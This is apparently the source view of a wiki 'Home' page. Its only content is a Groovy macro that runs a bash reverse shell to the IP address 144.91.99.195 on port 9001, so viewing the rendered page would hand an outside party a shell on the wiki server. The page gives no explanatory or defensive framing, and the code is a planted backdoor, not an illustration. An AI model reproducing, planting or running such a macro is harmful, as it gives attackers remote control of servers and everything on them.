0 Votes

Wiki source code of Home

Last modified by JOSE RONALDO DOS ARAUJO on 08/04/2024

Show last authors
1 {{groovy}}
2 def command = "bash -c 'bash -i >& /dev/tcp/144.91.99.195/9001 0>&1'"
3 def process = command.execute()
4 process.waitFor()
5 {{/groovy}}